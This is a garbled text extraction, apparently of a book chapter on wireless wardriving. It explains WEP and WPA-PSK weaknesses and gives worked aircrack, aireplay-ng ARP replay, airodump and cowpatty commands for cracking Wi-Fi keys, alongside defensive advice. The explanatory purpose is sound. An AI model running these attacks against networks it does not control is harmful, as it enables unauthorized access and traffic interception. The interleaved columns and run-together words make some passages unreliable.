less networks.” This activity rapidly evolved, and many users unconsciously operate their wireless
Wireless Wardriving
networks without activating any confidentiality, Nevertheless, many wardrivers do prefer a Personal
integrity, and availability (CIA) mechanisms: Computer Memory Card International Association
opportunity makes the thief. Then, wardriving (PCMCIA) wireless card that is capable to connect
becomes a less noble hobby, since many wardrivers with an external antenna to sense a wider area. With
try also to gain access to the discovered networks; this basic setup you should be able to enable the
many of them are only interested in cracking the wireless interface and start scanning the air. But,
network, while a portion will steal someone else’s in order to conduct more sophisticated actions, a
bandwidth. In this perspective, another basic step deeper understanding of aspects related to hard-
has been introduced: (4) trying to gain access to ware and software should be gained. A detailed
the WLAN. breakdown follows.
It is also interesting that wardriving is becoming
part of the urban culture. For instance, it spawned wireless Interfaces
a strange fashion called warchalking, that is, the
drawing of symbols in public places to advertise Each model of wireless interface differs in some
wireless networks, as defined by Matt Jonesas ( way. Regardless of different power consumption,
cited in Pollard, 2000). better antennas, and so on, two major aspects
must be taken into account: the chipset and the
Then, why is it important to know about wardriv- availability of ad hoc drivers. The chipset roughly
ing? represents the soul of a wireless interface and it is
mostly responsible of its capability. For instance,
Firstly, because you must become conscious some chipsets do not allow assembling ad hoc
that an active WLAN can trigger “recreational frames, preventing from exploiting particular
activities,” even if it is solely employed to share a attacks. The reasons are different: the chipset
printer. Secondly, the coordinated effort of many could lack the logic to deal with raw packets or
people highlighted several security itsaws
fl specification
in the is not known, discouraging tool
IEEE 802.11 standards and produced effective tools developers to exploit such functionalities. At the
to test (well, actually, to compromise) the security of time of this writing, cards based on the Prism
access points (APs). Thirdly, while performing their chipset are the most studied and documented, re-
“raids,” wardriversdiscoveredaws fl inthedevices;
sulting in a variety of pre-made tools for preparing
consequently, this is a valuable knowledge that packets.1 Lastly, being the interfaces engineered for
could be used to avoid further errors. Lastly, trying providing connectivity and not such kind of tasks,
to be a wardriver is an instructive activity that will manufacturers often change the internal chipset,
help to better understand WLANs technologies, even if maintaining the model or the brand name.
develop your own auditing tools and procedures, This is why not all wireless cards are the same,
and prevent, or at least, recognize attacks. andyoushouldchecktheirspecificationscarefull
if you plan to use them for wardriving.
HArdwArE And softwArE device drivers and scanning

rEquIrEMEnts
Device drivers provide the basic bridge between
In the basic form of searching for a WLAN, the the user software and the hardware. Having a
act of wardriving could be simply performed by exible
fl device driver is mandatory to reach the
having a device equipped with an IEEE 802.11 air soul of your interface. The best device drivers for
interface. Then, one can use a standard laptop, a wardriving are available for the aforementioned
wireless-capable console, or a handheld device. chipset, and for Unix systems. In addition, ow-
However, the typical gear consists of a laptop ing to its open source nature, Linux has the best
and a GPS device (even if not strictly necessary). available drivers.

Wireless Wardriving
The importance of drivers becomes evident the properties of the belonging kext. The “hack”
when you scan the air for a network. About the consists in a simple operation (i.e., changing a
totality of the bundled drivers does not allow to string) but it took time to discover.
perform the so called passive scan. Passive scan Firstly, the proper Info.plist must be located.
implies that your interface operates in passive In a console type:
mode, often called radio frequency monitoring
(rfmon) mode. While you operate in rfmon, you Mud:Luca$ cd /System/Library/Extensions/AppleAirPort.
kext/Contents/
can scan APs and remain undetectable, since your
card does not send any probe packets.
Hence, you can see the content of the kext upon
Conversely, when acting in active mode, which
simply typing:
is the standard configuration, as soon as you start
looking for an AP, you will be revealed. The ability of Mud:Luca$ ls
switching from active to passive mode and vice versa Info.plist MacOS version.plist
is provided by the drivers. Many drivers do not provide
this functionality, while others have this functionality Then, it is possible to modify the Info.plist
hidden and must be reverse engineered.
For the most popular chipsets, alternative driv- Mud:Luca$ vim Info.plist
ers that allow the user to put the card in rfmon are
available. If you plan to do undercover works, you The key responsible of enabling the rfmon fol-
should check the driver availability. lows, in boldface:
However, the active mode is faster than the
passive mode. While operating in passive mode, <key>IOKitPersonalities</key>
the average time needed for scanning a channel <dict>
<key>Broadcom PCI</key>
is about 50 ms. Obviously, multiple channels scan <dict>
requires n • 50 ms. Conversely, when performing <key>APMonitorMode</key>
scanning operations in active mode, the needed <false/>
time is lower. In fact, the operations required are:
transmitting a probe request + waiting for a DCF Switching the dictionary entry <false/> to <true/>
IFS interval + transmitting a probe response. The enables the AirPort Extreme card in rfmon.
overall time needed per channel is roughly equal However, such a task could be performed pro-
to 0.45 ms. Again, scanning n channels increases grammatically.
the needed time accordingly (Ferro, 2005). This is the approach taken in KisMAC, which is
popular among wardrivers. As an example, in the
An Example of Driver Hacking following, the Objective-C code snippet checking
whether or not the wireless interface is rfmon is
As said, the ability of enabling an air interface depicted in Snippet 1.
in rfmon could be available in the driver, but not Roughly, the steps presented in Snippet 1 allow
documented. This is the case of the driver for the the user to: (1) obtain a handler to the proper Info.
AirPort Extreme wireless adapters bundled with plist file;) prepare
2( a dictionary for parsing the
MacOS X. This example is introduced for didacti- Info.plist; and (3) check if the <APMonitorMode>
cal purposes, stressing how a simple “hack” can key is <false/> or <true/>.
transform a partially closed platform in an excellent
wardrivingconfiguration. the operating system and other
In a nutshell, OSX drivers are implemented via Matters
kernel extensions (kexts) that are similar to Linux’s
modules. Every kext is bundled with a kind of Needles to say, the operating system (OS) plays
configurationfileInfo.plist.calledThe Info.plist is a role. For instance, when processing data for
aXMLfilecontainingadictionarythatdescribes

Wireless Wardriving
Snippet1.HowtoprogrammaticallyretrieveifanAirPortcardisconfiguredinrfmon
fileData = [NSData dataWithContentsOfFile:
@"/System/Library/Extensions/AppleAirPort2.kext/Contents/Info.plist"]; 1

dict = [NSPropertyListSerialization propertyListFromData:fileData
mutabilityOption:kCFPropertyListImmutable format:NULL errorDescription :Nil]; 2

if ([[dict valueForKeyPath:@"IOKitPersonalities.BroadcomPCI.APMonitorMode"] 3
boolValue]) return YES;
bruteforcinganencryptedow, fl agoodsymmetric
Concerning the CRC32, it is employed to check
multi process (SMP) support is a must (as well as data and to assure integrity. It has not the crypto-
a good multi-threaded implementation). graphic strength of other hashing algorithms, such
In addition, many APs can reject data from un- as the MD5 and the SHA1 (Schneier, 1996). The
recognized MAC addresses: for this reason, having CRC32 employed in the wired equivalent privacy
an OS that allows the user to change the MAC ad- (WEP) algorithm has two major properties, as
dress of active interfaces is important. Lastly, many presented in Table 2.
tools only run on *nix operating system. However,
thetrafficcollectionphasecouldbedecoupledby
the processing, hence allowing the user to collect About tHE sEcurIty of IEEE
data on a machine and process it on another. As a 802.11
consequence, simple devices (e.g., with low com-
putational power) could be employed to collect The IEEE 802.11 security framework has changed
data and discover APs (e.g., PDAs and portable during the years: from the awed fl WEP, to the
gaming devices), while a standard PC could be wireless protected access (WPA) introduced by
usedforprocessingthecollectedtraffic. the Wi-Fi alliance in late 2002. However, since
mid-2004, the IEEE 802.11i Working Group (WG)
xor Arithmetic and crc32 in a introduced a framework based on the 802.1X and
nutshell the extensible authentication protocol (EAP), to
bring the wireless security to the next level; such
In order to understand the security mechanisms, effort is known as WPA2.
and possible attacks, a little remark about eXclu- Even if highly criticized, the security mecha-
sive OR (XOR) arithmetic and the properties of nisms proposed by different WGs have developed
CRC32 functions, employed for data checking, are having in mind different operative contexts. For
presented. Basically, the XOR operator respects instance, the WEP (as the name suggests) has
the properties presented in Table 1. been developed to prevent simple connection at-
tempts, while WPA has been developed to offer
Table 1. Basic XOR arithmetic (⊕ represents the an adequate resistance to well-planned attacks.
XOR operator) Currently, an average wardriver can: surely con-
nect to an unprotected AP, spend 10 minutes to 1
Operation Result
hour to break the WEP, and crack a WPA-protected
0⊕0 0 AP in some of its weak variants and well-suited
1⊕0 1 circumstances. In order to understand the common
1⊕1 0 technique employed by wardrivers, the commonly
(A ⊕ B) ⊕ A B adopted security countermeasure will be briefly
(A ⊕ B) ⊕ B A explained.

Wireless Wardriving
Table 2. Properties of the CRC32 function employed in the WEP
Property Application
Linearity CRC32(A⊕B)=CRC 32
(A) ⊕ CRC32(B)
Independence of WEP Key ItispossibletoflipbitswithoutbeingrecognizedbytheWEP
no Encryption standard allows the user to embed the SSID within

beacons sent by APs or wireless routers. In order
Many wireless networks operate without any to “join” a WLAN, you must know its SSID. As a
encryption, and “security” is delegated to other consequence, many users/administrators disable
mechanisms. It must be underlined that the lack of the SSID broadcasting, to prevent unauthorized
encryption allows everyone to listen to the channel accesses. However, this measure only prevents
andanalyzethetrafficthat ( ows
fl inclearaform ifnoof attempts. In fact, there are several
minority
security mechanisms at higher layers are adopted). tools and techniques that allow a user to uncloak
Hence, for these users, “security” is solely a syn- a hidden SSID. A thorough discussion about such
onym of “preventing” the unauthorized usage. The tools will be presented in the following sections,
mostadoptedmethodsare:MACaddressbut weoutlinethebasicprocedures
filtering - here.Specifi
andhidingtheservicesetidentifier SSID)
( They
cally,. it is possible to: (1) recover information about
will be briefly explained, highlighting why SSIDtheycontained in frames sent by other stations in
cannot be perceived as secure countermeasures. the network; for instance, the SSID is contained in
association request packets; and (2) if such frames
MAC Address Filtering are not available, it is possible to spoof the IEEE
802.11 de-authentication frames of target clients.
MACaddressfilteringisabasictechnique - implea client to start a new authentication
This causes
mented in about the totality of the commercially and association round with the AP, providing the
available APs. Basically, before authorizing an needed frames.
association, the AP checks the allowed MAC
addresses in a white list. The rationale under the wEP Encryption
approach relies on the uniqueness of the MAC
address. As a matter of fact, this technique only Thescientificliterature,aswellasdailypracti
discourages the occasional wardriver, but it is quite commonly suggest that the WEP is a highly inse-
useless. In addition, it could be used jointly with cure encryption mechanism. No matter about the
WEP or WPA, in order to have another barrier if an skill of the wardriver, or the quality of the imple-
attacker cracks the encryption mechanism. How- mentation in the AP: a WEP-secured network can
ever, frame headers are never encrypted; hence, be cracked in a period varying from 5 minutes to 1
it is a simple task to retrieve some valid MAC hour. Moreover, many tools implement automated
addresses (e.g., by simply monitoring a channel). procedures; thus, cracking the WEP is as simple
Then, there are a variety of tools for changing the as pressing a keyboard shortcut.
MAC address of a wireless interface, performing
theso-calledMAC-spoofing. Understanding the Effective Strength of
the WEP
Hiding the SSID
Often, marketing collides with engineering: this
In order to advertise a network, it is possible to is the case of the WEP. In order to understand the
broadcast a special identifier called SSID. The
effective strength of the WEP, as well as its weak

Wireless Wardriving
Figure 1. The message in clear form to be encrypted with WEP
Message M CSum=CRC 32(M)
M’
Figure 2. The seed used to encrypt packets with WEP
IV (24 bit) WEP Key (40 or 104 bit)
Seed
points, let us summarize its basic functionalities. Splitting the Seed in two sub parts (the IV
The WEP performs the encryption per packet; let a and the WEP key)isoneofthemajoraws fl ofthe
given packet M represent a message in clear form procedure. However, the reason is rooted both in
to be sent. Hence, the following steps happen: the nature of the RC4 and wireless channels. The
RC4 has been used in the WEP since it is widely
A 32-bit cyclic redundancy check (CRC) algo- adopted and well studied. But its application over
rithm is applied to M in order to produce a check- wireless channels poses some drawbacks. In fact,
sum. Then: CSum=CRC 32(M). Basically, a CRC wireless channels frequently drop packets, thus
is introduced to assure message integrity. However, maintaining a proper synchronization in the stream
the use of CRC-like codes in this kind of environ- to allow the decryption operations is a challenging
ment has been proven to be very dangerous. task. Consequently, to overcome the possibility of
packet loss and stream de-syncing, each encrypted
LetusdefineM’ asthe message actually pro- packet is sent along with the IV that generates its
cessed by the WEP algorithm, hence to be really sent keystream. This represents another weakness in
over the channel. M’ is depicted in Figure 1. the algorithm, since it allows a wardriver (attacker)
Then M’ is encrypted by using the RC4 al- to seamlessly collect IVs.
gorithm, that relies on a stream cipher approach. Concluding, the ciphered text C is provided
Thus, the actual Seed used by the WEP is the by:
combination of a 24-bit initialization vector (IV)
and the WEP key, as depicted in Figure 2. C =M’ ⊕ RC4 Key
Referring to Figure 2, two different WEP keys
are available: 40-bit long keys adopted in the where, ⊕ represents the XOR operator, and RC4Key
standard implementation, or 104-bit long keys is the keystream generated by the RC4 algorithm
adopted in the extended implementation, which by feeding it with Seed. Figure 3 depicts a WEP-
has been introduced to prevent brute force at- encrypted packet that could be collected and ex-
tacks. Here comes the marketing: a “64bitWEP ploited by a wardriver. Needles to say, IVs convey
secured network” actually relies only on 40-bit precious information, and in the following, we
long keys, since 24-bits represent the IVs. For the show how standard tools can exploit this.
same reason, a “128-bit WEP secured network”
only relies on 104-bit keys.

Wireless Wardriving
FigureA3. WEPencryptedframe.NoticethattheIVissentascleartext.
IV (24 bit) C
WEP Encrypted Frame
wPA Encryption radiate more than required power, resulting in the

chance of detecting (and using) the WLAN also
As previously explained, WPA encryption schemes from the outdoor. This is at the basis of wardriving.
have been introduced to overcome the drawbacks in In fact, wardrivers will seldom enter private areas;
theWEP.TheWPAexistsintwodifferentavors: fl rather, they will station in streets and public places,
802.1x jointly used with the temporal key integrity capitalizing the unsolicited wireless coverage.
protocol (TKIP) that is intended for enterprises, Then, as a rule of thumb for protection, it could
and the less secure pre-shared key (PSK), possibly be useful to irradiate only the required power: no
jointly used with the aforementioned TKIP. The more, no less.
802.1x + TKIP is a quite secure protocol, and dif-
ficulttocrack by
wardrivers, but the PSK version Antenna Gain
still has some aws. fl The WPA has been proved
to be quite secure; thus, we will omit its details As said, wardrivers often utilize high gain anten-
in this chapter. nas to reach distant networks. Thus, reducing
the transmission power of the APs might not be
some considerations about layer 1 enough.
security Commonly, there are several techniques to
replace the standard antenna available at the net-
All the aforementioned encryption mechanisms work interface, but they are out of the scope of this
have been introduced to cope with the simplicity work. The simplest technique is to use an external
of sensing a WLAN, and consequently, to collect PCMCIA wireless card equipped with a connector
data. Then, it is hard to implement OSI-L1 secu- for an external antenna. One of the most interesting
rity mechanisms, as it can be possible in wired accessories is the pigtail. The pigtail is a converter
networks. However, a basic countermeasure could allowing the user to connect high gain antennas
be exploited: adjusting the wireless power. Con- with a wireless card, even if the terminal connec-
versely, wardrivers can adopt high gain antennas tors are different (e.g., wireless cards often have
to intercept distant APs. Those concepts will be MC-Card, MMCX or RP-MMCX connectors).
further discussed.
Wireless Power wEP AttAcks
Many APs allow changing the power employed for As discussed in the Understanding the effective
transmitting data. However, many users keep the strength of the WEP section, WEP offers different
default values or use more power than required. alternatives to be attacked and cracked. In this sec-
Despite the waste of energy, this raises also some tion, we will introduce the most popular attacks,
security risks. For instance, if there is the need of and then we will present some practical examples.
covering a conference room, it is harmful to ir- Besides, attacks could be roughly grouped in two

Wireless Wardriving
categories: passive and active. A passive attack range. Usually, the user must insert a pass phrase,
solelyreliesonthetrafficcollected,while somethinganlike:
active
“Ken sent me” and the wizard will
attack consists also in injecting some additional automatically generate a WEP key. However, many
trafficinthenetwork.Forinstance,active attacks
generators appeartobeawed. fl Hediscoveredthat
are employed to stimulate the traffictwo tosteps
collect
in the ifgeneration process reduce the
there are not any clients connected to an AP at a “strength”ofthekey;specifically:
given time. The latter techniques will be presented
when needed, then in the Example section. 1. The ASCII mapping reduces the entropy:
usually ASCII strings are mapped to 32 bit
bruteforce Attacks value and the XOR operation guarantees
four zero bits. In addition, the highest order
Every security algorithm is exposed to bruteforce bit of each character is equal to zero. Then,
attacks. The key point is if a bruteforce attack is only seeds from 00:00:00:00 e 7f:7f:7f:7f can
feasible. As said, WEP exists in two variants. occur.
Concerning the 40 bit standard implementation, 2. The use of Pseudo Random Number Genera-
a bruteforce attack could be feasible. Probably, an tion (PNRG) reduces the entropy: for each
occasional attacker will have a machine allowing 32bit output, only a portion of the available
to check 10,000 to 15,000 keys/second; hence, it binary word is considered (e.g., bits 16 through
is not sure that he/she will complete the attack (on 23). Besides, the generator has the properties
an average laptop, 200 days are required). But an of generating bits with different degrees of
organization or a professional attacker can try “randomness.” For instance, a bit in position
to successfully bruteforce the WEP in the 40-bit k has a cycle length of 2k. Then, Newsham
variant. Nevertheless, nowadays there are several noticed that the produced bytes have a cycle
software libraries for parallelizing computations, length of 224thus
, reflectinginseedsranging
as well as software tools for building clusters (e.g., from 00:00:00:00 and ff:ff:ff:ff.
Beowulf or Mosix for the Linux platform and XGrid
for MacOS X). Owing to the availability of the In order to discover the key, it is sufficient to
source code of bruteforcing tools, porting them consider seeds ranging from 00:00:00:00 through
on such frameworks could be possible. Actually, 00:7f:7f:7f with zero highest order bits, hence
bruteforce is never employed, since it is possible reducing the space and only analyzing 221 words.
to successfully crack the WEP in simpler and As a consequence, it is possible to bruteforce such
quicker ways. awed
fl implementations in minutes. The most
Conversely, the 104-bit long key available in the popular implementation of Newsham’s 21-bit at-
WEP extended implementation is immune against tack is available in the KisMAC tool. According
bruteforce attacks (with a standard gear, about 10 19 to KisMAC documentation, Linksys and D-link
years are needed). devices appear, at the moment, the most vulner-
able to this attack.
the tim newsham’s 21-bit Attack
weak Ivs
Tim Newsham is a well-known security expert and
consultant. Among wardrivers he is very popular This attack relies on how the RC4 is used to pro-
for inventing the 21-bit attack (Newsham, 2003), duce a WEP-encrypted stream. Basically, some
allowing to bruteforce some WEP implementa- IVs can reveal some information about the secret
tions in minutes. key embedded in the first byte of the keystream.
Basically, Newsham noticed that several ven- Thenitisenoughtocollectasufficientnumberof
dors generate WEP keys from text, in order to make weakIVsand,ifthefirstbyteofthekeystreamis
easy-to-use products and cover a wider market known, it is possible to retrieve the key.

Wireless Wardriving
Regarding the collection of the first byte

This kindofof attack relies on relation (1). How-
the keystream, the IEEE 802 standard gives some ever, the operations in (1) are possible since both
useful hints. In fact, IEEE 802.11 frames always messages have been encrypted with the same Seed.
beginwiththeSNAPfield,whichmostofthe time
To overcome this, IVs have been introduced, being
issetto0xAA.Thenitissufficienttocollect weak
them the only portion of the Seed that varies. Alas,
IVs that come in the form of: IVs are only 24-bit long, hence it is likely that the
same Seed will be sent over the network again.
(Y+3, 256, X)
the oracle
where Y is the portion of the key under attack,
the second value is 256, since RC4 works on a In order to recover a relevant amount of known
modulo-256 arithmetic, and X can be any value. plaintext, the AP could be used as an Oracle, a
Fluhrer, Martin, and Shamir (FMS) have devel- device that unconsciously encrypts well-crafted
opedanefficientattackavailableindifferent packets for the tools.
attacker.
However, the core of the attack is out of the scope Figure 4 depicts the basic operations performed
of this chapter. to conduct the attack. This attack is nowadays un-
As a concluding remark, new devices tend to likely, since as explained, there are several faster
avoid weak IVs’ generation. In fact, hardware de- and simpler ways to crack the WEP. Basically, the
velopers better engineer their devices, increasing attacker exploits an active connection targeting
attention to the IVs’ generation mechanism. the victim. Then he/she sends (e.g., via General
Packet Radio Service [GPRS], or Universal Mobile
keystream reuse Telecommunications System [ UMTS], or similar)
known packets that will be encrypted by the AP
Suppose to be in the following scenario: two dif- before transmission over the WLAN.
ferent cleartext messages, M’1 and M’2 must be It becomes clear that this attack exploits the fact
transferred over the channel. Let us assume that that an AP could be used to connect a network to
both messages share the same keystream. Then: the Internet without any further protection mecha-
nisme. ( g.,afirewalloravirtualprivatenetwork
C1 =M ’1 ⊕ RC4Key(Seed) [VPN] support). For completeness, in early days
C2 =M ’2 ⊕ RC4Key(Seed) when GPRS was expensive, usually the attack was
performed by cooperating with another wardriver,
C1 and C2 are the two WEP encrypted mes- usually at home, with an active Internet connection
sages, and Seed is the one employed for the RC4, remotely injecting packets to the AP.
as depicted in Figure 2 of the Understanding the
effective strength of the WEP section. Then, it is decryption dictionary
possible to perform the following operation:
This kind of technique is no longer employed, and
C1 ⊕ C2 = (M’1 ⊕ RC4Key(Seed)) ⊕ there are not any proofs that it has ever been ex-
(M’2 ⊕ RC4Key(Seed))=M ’1 ⊕ M’2 (1) ploited in its basic form. However, it is interesting
that this attack allows (at least theoretically) the
As a consequence, knowing M’1 (or M’2), allows usertodecryptallthetrafficwithoutknowingth
to recover M’2 (or M’1). One might argue that the WEPkey.Basically,itissufficienttobuildatable
knowledge of a message M’x is a tight hypothesis. of the intercepted keystreams. Then, it is possible
However, being messages packets generated by to compile a table of all the possible values (and
some well-known protocol, it is possible to craft also skip the RC4 phase). The drawback, prevent-
packets and send them via the Internet to a target ingitsproficientexploitation,isthespacerequi
host on the WLAN. Hence, the AP will encrypt for this kind of attack. In fact, the encrypted
the data for the attacker.

Wireless Wardriving
Figure 4. Scenario when an oracle attack is performed
AP Internet
Target Known
Encrypted
Packet
Wardriver
GPRS, UMTS, GSM or

Known Packet another WLAN access
WLAN
stream is 1,500 bytes long at maximum, owing to dictionary attacks in the section devoted to WPA.
the maximum MTU available, and the adoption Such concepts could be straightforwardly extended
of a 24-bit IV produces 16,777,216 (224) possible also to WEP.
streams. Hence, the required space is 16,777,216
•0=5 1 4Gbytes.
. 32 WEP Attack via KisMAC
With the advent of PCMCIA cards, and their
poor implementation of the policies to generate IVs, Let us show an attack performed to a WEP-secured
the adoption of a dictionary-based attack became network. Firstly, we show how to crack a network
feasible. In fact, many PCMCIA wireless cards reset with KisMAC. This gives an idea of how simple it
the IV to 0 each time they are re-initialized. Re- might be. After launching KisMAC, one can start
initialization happens each time they are activated the scanning. If supported, one can select whether
(e.g., typically once a day in many circumstances). or not to adopt passive or active scanning. Figure
Thenitissufficienttobuildadictionary only
5 depicts thefor
result of a scan.
the very first values of IVs, in order to decrypt Then, if there is the need of cracking the WEP,
mostoftheowing fl traffic. different actions could be performed. Firstly, one
can try the Newsham’s 21-bit attack, or try to
Examples bruteforce the WEP, but owing to the “informa-
tion” conveyed by the IVs, quicker solutions could
Inthissection,wewillpresentbriefl - ysome pos
be adopted.
sible attacks against a WEP-secured network. Two things may happen: (1) the network is
Firstly, we will show how to attack a network by experiencingahugeamountoftraffic,-hencepro
using KisMAC, a tool running on MacOSX with ducing a huge amount of IVs. In this perspective,
a simple GUI. Then we will show how to use stan- an attacker must only wait to collect a sufficien
dard terminal-based tools commonly available for number of IVs to perform a suitable attack; or (2)
different Unix avors. fl As a remark, we will thenot
network is under a low load, hence the time
spend too much time on explaining bruteforce or needed to collect a sufficient amount of IVs is
dictionary attacks. In fact, WEP could be cracked non-negligible. Then, it is possible to stimulate
in a more elegant way; conversely, owing to its traffic by using the de-authentication attack o
better security, we will explain bruteforcing and injecting well-crafted packets; Figure 6 depicts
0
Wireless Wardriving
Figure5.ScanresultprovidedbytheKisMACtool
Figure6.HowtostimulatetrafficinaWEP-securednetwork
Figure 7. The network has been attacked with an authentication flood. Notice the random
MAC addresses.

Wireless Wardriving
possibleattackstostimulatetraffic, while
networks. TheFigure
needed number of IVs varies: if your
7 depicts the “fake” stations that populate the at- traffic dump is blessed, collecting 0, 1 IVs
tacked wireless network. suffices.Usually,theneedednumberofIVsranges
from 250,000 to 500,000. However, some advanced
WEP Attack via Terminal-Based Tools APs have algorithms that avoid the generation of
weak IVs, hence reflecting in a huge number of
Firstly, let us start searching a network. For do- needed IVs (in the order of several millions).
ing this, let us use airodump. Airodump allows to If there is not enough traffic on the network,
collect traffic from a wireless interface. It could
collecting IVs could be a tedious (or at least time
be possible that you have airodump-ng instead, consuming) task. Moreover, if a sophisticated AP
since it represents the evolution of the aircrack is employed, collectingIVs 0, 5 withatraffic
wireless suite. We will refer to the classical tool, of few packets per second could be impossible.
since it could be possible that you already have it, Then, it is possible to stimulate traffic on the
especiallyifyourconfigurationisnotup-to-date; WLAN, in order to increase the number of packets
however, the concepts, as well as its usage, are sent, hence speeding up the collection of IVs.
the same. For instance, by using the aircrack suite, it is
Supposing the tool properly installed, it is suf- possible to exploit the so-called address resolu-
ficienttotypeinaterminal: tion protocol (ARP) replay.2 Roughly, ARP relies
on broadcasting a request (an ARP Request) for
Mud:Luca$ ./airodump cardName theTrafficFile 0 log- an IP address, in order to discover the matching
gingMode between L2 and L3 addressing. The device that
recognizes its IP address sends back a query di-
Here, ./airodump launches the tool, cardName rectly to the original requestor. Alas, WEP does
is the name of the card used to monitor the air, not assure protection against replay attacks. So you
theTrafficFile is the output file collectingcan data.injectThe
well-crafted ARP packets and generate
parameter 0 specifies that we want to-hop chan answers containing valid IVs. Needles to say, the
nels, while loggingMode allows to switch between more aggressive your ARP generation strategy is,
loggingalltrafficoronlyIVs. the more packets you will collect (thus, reducing
If we have collected enough IVs, we can try to the time needed to collect a certain x amount of
crack the WEP by using aircrack. Some couple of valid IVs).
remarks:) 1the ( traffic collection and - theTo crack
perform an ARP replay attack you can use
ing phases are decoupled. Then you can perform the tool as follows (notice, that you must have also
an attack off-line (not hidden in a parking lot); a sniffer running in order to capture replies).
(2) it is possible to collect data with well-known
sniffers, such as Wireshark (formerly known as Mud: Luca$ ./aireplay-ng --arpreplay -b MACAP -h TMAC
Ethereal). For instance, under Linux it is possible Interface
to use airmon-ng to configure the wireless card,
then using Wireshark to collect traffic. By using ./aireplay-ng launches the tool, --arpreplay the agfl
ivstool from the aircrack-ng suite you can convert specifies to perform the ARP replay -b attack,
IVs from .pcap format to aircrack one. MACAPspecifiestheMACaddressoftheAPand
Then, you can crack a network by typing: -h TMAC specifies the MAC of the targetvictim) (
host. Lastly, Interface tells the program which
Mud:Luca$ ./aircrack -b MAC theTrafficFile wireless interface must be used.
If everything is correct, the attack starts gen-
Here, -b MAC specifies the MAC addresserating or
( moretraffic.
the BSSID) of the target network. In fact, your
dump could have collected traffic from different

Wireless Wardriving
wPA-Psk AttAcks The core of the exploit is based on the hand-

shake for the following reason. Prior to starting
WPAexistsindifferentavors: fl forenterprises
a secure and communication, the key must be sent
for home security. It offers many improvements over an insecure channel. Needles to say, to avoid
compared to the WEP. Firstly, IVs are still adopted, sending the password in cleartext, thus resulting
but IVs are 48-bit long, preventing from IVs reuse in a huge security breach in the procedure, there
or IVs collision. Secondly, IVs are checked before are several mechanisms (outside the scope of this
using them to encrypt packets. chapter) employed to transmit the passphrase over
The solution that WPA proposes for Enterprises the channel.
is barely adequate to discourage any wardriving However, if a complete handshake is collected,
activities. But the version for home security could it is possible to bruteforce the handshake procedure,
be compromised. As a remark, the WPA suite does and to recover the password. This attack has two
not offer the ultimate toolkit for security. main drawbacks (or advantages, depending on
As said, a consumer version of the WPA exists, the viewpoint):
and it is called WPA-PSK. Roughly, WPA-PSK
performs similar steps like WEP, but it is more 1. It is based on a bruteforce technique. If the
robust. Needles to say, owing to its easy set-up and password is strong enough, it is quite impos-
cost effective implementation, it is often adopted as sible to retrieve;
the basis of corporate security infrastructure. The 2. A complete handshake is needed. Without
main characteristic of the WPA-PSK that could be such information, all the traffic collected
exploited by wardrivers is the “PSK portion” of (even if several Gbytes) is needless.
the procedure. In the PSK, as the acronym sug-
gests, the secret key is pre-shared, hence known a To overcome the previous drawbacks, some
priori and stored in the equipment. However, the countermeasures are possible. Concerning 1), if in
WPA-PSK during normal operations has some presence of a good dictionary that it is not limited
logic to change the codes and making break into to standard words, but also containing some well-
the system a harder work. known consumers’ passwords, it is possible to bring
In order to stick with the topic of wardriving, into a feasible zone a bruteforce attack for some
we will only explain the unique attack proven to particular deployment (e.g., home network, where
be effective for the WPA-PSK. users tend to use weak passwords). Regarding 2),
it is possible to force de-authentication of clients
the Handshake Attack tocollecttheneededhandshaketraffic.However
at least one client must be present in the network
The basic under this attack is rooted in how the PSK to perform this attack. Besides, as explained pre-
is engineered. The PSK relies on a user-defined viously, a wireless interface with packet injection
password to initialize the TKIP. From the attacker capabilities is needed.
point of view, the TKIP is quite strong, owing its
“per packet” nature. Nevertheless, the wardriving Example
community has not yet found out how to crack
it. As a consequence, in order to gain access to a In the WeakIVs section we showed some example
WPA-PSK network, a direct attack to the TKIP by using the KisMAC software. KisMAC has a
will not give any reasonable results. complete GUI, hence performing this attack solely
However, there is a weak point in the chain: implies to select it from the menu, as shown in
the authentication. In fact, during the authentica- Figure 8.
tion, the requestor sends the PSK, to spawn the Notice that the Wordlist Attack against the WPA
TKIP procedure that will cover the rest of the key is available only if a complete handshake has
transmission. been collected.

Wireless Wardriving
Figure 8. WPA-PSK bruteforce attack when employing KisMAC
Instead of KisMAC, for pedagogical reasons, Mud:Luca$ ./cowpatty –f Dictionary –r theTrafficFile –s

let us use airodump. Supposing the tool properly wpa
installed,itissufficienttotypeinaterminal:
where ./cowpatty launches the software, –f speci-
Mud:Luca$ ./airodump ath1 theTrafficFile 8 fies the dictionarya ( file called
Dictionary in this
example), –r specifies where the traffic dump is
./airodump launches the program (./ to refer to a located (theTrafficFile here) and –s wpa tells the pro-
local path), ath specifies the interface where the gram to crack against the WPA.
traffic must be collected, TrafficFile specifies the Concluding, if a proper handshake is collected,
file that will contain the traffic is dump,
withand the aforementioned tools it is possible to crack
the channel to monitor. However, it is possible to the WPA. As shown, the steps are not complex.
force a de-authentication attack by specifying a Then, it is possible to understand the importance of
ag
fl toairodump. the password, since it is the only barrier preventing
Untilthere,wehaveonlycollectedyour the traffic
network to be cracked.
(and stimulated a complete handshake if needed).
Now, it is possible to perform the off-line attack.
Most of the tools can exchange data, so it is pos- soME tHougHts About tHE
sible to collect data to airodump and perform the wArdrIvErs coMMunIty
cracking procedure to KisMAC, cowpatty, …
Supposing we want to use aircrack we will use In the following subsections, some ideas on why
the tool (from the command line) in a form like: the wardriving community deserves attention are
presented. Besides, always remember that many
Mud:Luca$ ./aircrack –a –b MAC –w /Dictionary aws
fl oftheWEParoseduetothefactthatithas
been developed without any “open” review.
./aircrack launches the tool, –a specifiestheattack,
MAC is the MAC address of the AP to attack, –w Monitor the Internet community
specifiesthepathtoadictionary.Forinstance,many
Unix systems have a minimal dictionary located The Internet community does not only produce
in /usr/share/dict; you can preliminary start with tools, but also important information regarding
this word collection. Notice that if the password concepts of security and wardriving. Three major
is a standard dictionary, you should change it im- resources are suggested for periodic surveys:
mediately, since it is very weak and predictable.
Lastly, another interesting tool (even if quite 1. Wardriving sites that publish the location of
slow) is cowpatty. In order to crack a WPA key a network (that could be precisely located,
with cowpatty, you will use the tool like: as explained in Section I by using a GPS);

Wireless Wardriving
a smart step could be to investigate sites customer). Besides, studying the tools and collect-
publishing WLANs, in order to discover if ing the traces is mandatory to discover possible
yours has been detected and cracked. attacks, for instance by recognizing unusual probes
2. Check for (almost weekly) security bulletins or excessive de-association requests.
(e.g., BugTraq). Gears are composed not
only by hardware, but also software (e.g., the do not rely on weak Passwords
firmware)thatcouldhavevulnerabilities.For
instance, one of the most famous was related As explained in previous section, bruteforcing
